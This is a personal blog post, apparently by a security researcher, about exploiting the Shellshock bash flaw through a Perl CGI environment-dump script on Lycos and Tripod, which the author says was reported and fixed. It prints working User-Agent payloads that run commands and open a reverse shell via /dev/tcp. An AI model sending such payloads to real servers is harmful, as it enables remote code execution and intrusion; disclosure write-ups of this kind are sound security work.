My ShellShockings

While I was suffering the interwebs my eyes caught a perl script which prints out the environment variables. For example something like this.

use CGI;

$cgi = new CGI;

for $key ( $cgi->param() ) {
	$input{$key} = $cgi->param($key);

print qq{Content-type: text/html


foreach $key (sort (keys %ENV)) {
	print $key, ' = ', $ENV{$key}, "<br>\n";

for $key ( keys %input ) {
	print $key, ' = ', $input{$key}, "<br>\n";

print qq{<form METHOD=POST><input type="submit" value="Post Request">
         <input name="postfield"></form>};
print qq{<form METHOD=GET ><input type="submit" value="Get  Request ">
         <input name="getfield" ></form>};

print qq{</body></html>};

This would output the following.

CONTEXT_DOCUMENT_ROOT : /var/chroot/home/
DOCUMENT_ROOT : /var/chroot/home/
GD_PHP_HANDLER : x-httpd-php5-3
HTTP_ACCEPT : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
HTTP_ACCEPT_ENCODING : gzip, deflate, sdch
HTTP_CONNECTION : keep-alive
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
PATH : /usr/local/bin:/usr/bin:/bin

It takes the “User-Agent:” field from the client. We can modify this to whatever input we like. So yeah it was vulnerable to the bash shellshock vulnerability. For example let’s inject “uname –a” and see the output.

GET xxxx HTTP/1.1
User-Agent: () { :;}; echo; /bin/bash –c “uname –a”
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

Let’s try () { :;}; echo; /bin/bash –c “/sbin/ifconfig”

Since we are arbitrarily injecting code into the bash shell we can get a reverse connection like this.
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/ 0>&1

That is it Game Over 🙂 This is how I owned lycos and tripod. As soon as I found this I reported them and they have already fixed this.
By the way was too affected by the Shellshock vulnerability.

After reporting them it was too successfully patched 
Bonus: Tripod had a reflected XSS vulnerability too.

I don’t know why it gives such a search result 😉


One thought on “My ShellShockings

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s